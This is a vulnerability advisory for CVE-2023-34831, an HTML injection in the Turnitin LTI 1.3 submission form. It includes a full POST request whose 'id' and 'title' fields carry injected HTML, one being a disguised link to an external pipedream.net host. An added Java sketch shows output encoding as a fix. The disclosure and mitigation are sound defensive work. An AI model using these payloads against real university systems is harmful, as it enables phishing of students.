Turnitin LTI Version 1.3 - HTML Injection - CVE-2023-34831
-----------------------------------------------------------
Type: Authenticated Remote attack
We have identified that the "Submission Web Form" of the Turnitin LTI tool/plugin version 1.3, which is used by third parties such as universities (Blackboard software), is vulnerable to HTML injection. The issue affects the "id" and "title" HTTP POST parameters of the submission web form, where students submit their reports for similarity/plagiarism checks. By leveraging this issue, an attacker is able to cause arbitrary HTML code to be rendered in a user's browser within the security context of the affected site. An attacker can trick the victim into clicking on a malicious link via a social engineering/phishing attack, which can result in malware download or sensitive information harvesting.
A successful attack requires the attacker to have access to the targeted user's account, so that they are able to craft the malicious request based on user data such as course id, content id, etc.
Sensitive values have been replaced with random ones for confidentiality reasons.
Evidence is provided below:
Edited/Malicious Request:
POST /webapps/ip-turnitintool-BB5d0xxxxxxx3e79/student/submit?course_id=_11111_1&course_batch_id=11111-2056&content_id=_1111111_1&assign_id=11111&selectPart=&selectUser= HTTP/1.1
Host: university-domain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------9450000001598047787961111111
Content-Length: 1077
Origin: https://university-domain
DNT: 1
Connection: close
Referer: https://university-domain/webapps/ip-turnitintool-BB5d0xxxxxxx3e79/student/submit?course_id=_11111_1&course_batch_id=11111-2056&content_id=_1111111_1&assign_id=11111&selectPart=&selectUser=
Cookie: mycookies

-----------------------------9450000001598047787961111111
Content-Disposition: form-data; name="id"

-1"</span></div><b>HTML Injection</b><div><span>"-1<b>HTML Injection</b>
-----------------------------9450000001598047787961111111
Content-Disposition: form-data; name="submissionType"

file
-----------------------------9450000001598047787961111111
Content-Disposition: form-data; name="userBatchId"

My-student-id
-----------------------------9450000001598047787961111111
Content-Disposition: form-data; name="title"

<a href="https://enwj2e1t9en4.x.pipedream.net"><b>View Results</b></a>
-----------------------------9450000001598047787961111111
Content-Disposition: form-data; name="partTurnitinId"

13479124
-----------------------------9450000001598047787961111111
Content-Disposition: form-data; name="multipartFile"; filename=""
Content-Type: application/octet-stream


-----------------------------9450000001598047787961111111
Content-Disposition: form-data; name="_disclaimer"

on
-----------------------------9450000001598047787961111111--
Affected Source Code:
<div id="inlineReceipt_bad" class="receipt bad">
<h3 class="hideoff">Failed</h3>
<span id="badMsg1"><ul><li>id - Failed to convert property value of type 'java.lang.String' to required type 'java.lang.Integer' for property 'id'; nested exception is java.lang.NumberFormatException: For input string: "-1"</span></div><b>HTMLInjection</b><div><span>"-1<b>HTMLInjection</b>"</li><li>multipartFile - Please select a file.</li><li>disclaimer - You must accept the stated notice.</li></ul></span><br>
<td>Submission Title</td><td><span class="truncate submission-title-receipt"><a href="https://enwj2e1t9en4.x.pipedream.net"><b>View Results</b></a> </span></td>
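
Mitigation sketch (added example, not taken from Turnitin or Blackboard code): the "id" field is validated with a fixed error message instead of echoing the conversion exception text, and every dynamic value, including "title", is HTML-encoded where it is written into the receipt. The class and method names are hypothetical; the sample values are the ones from the request above.

```java
import java.util.LinkedHashMap;
import java.util.Map;

// Added illustration; names are hypothetical, not the plugin's own code.
public class ReceiptEncodingDemo {
    // Encode the characters that let a value break out of HTML text or a quoted attribute.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#39;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    // Validate "id" explicitly and return a fixed message, so the raw input
    // never reaches the page through an exception string.
    static String validateId(String raw) {
        try {
            Integer.parseInt(raw.trim());
            return null; // valid integer, no error to report
        } catch (NumberFormatException e) {
            return "id - must be a whole number.";
        }
    }

    // Build the failure receipt; every dynamic value is encoded at the output sink.
    static String renderReceipt(Map<String, String> form) {
        StringBuilder html = new StringBuilder("<span id=\"badMsg1\"><ul>");
        String idError = validateId(form.getOrDefault("id", ""));
        if (idError != null) html.append("<li>").append(escapeHtml(idError)).append("</li>");
        html.append("</ul></span><br>\n<td>Submission Title</td>")
            .append("<td><span class=\"truncate submission-title-receipt\">")
            .append(escapeHtml(form.getOrDefault("title", ""))).append("</span></td>");
        return html.toString();
    }

    public static void main(String[] args) {
        Map<String, String> form = new LinkedHashMap<>(); // values copied from the request above
        form.put("id", "-1\"</span></div><b>HTML Injection</b><div><span>\"-1<b>HTML Injection</b>");
        form.put("title", "<a href=\"https://enwj2e1t9en4.x.pipedream.net\"><b>View Results</b></a>");
        System.out.println(renderReceipt(form)); // title appears as inert &lt;a href=...&gt; text
    }
}
```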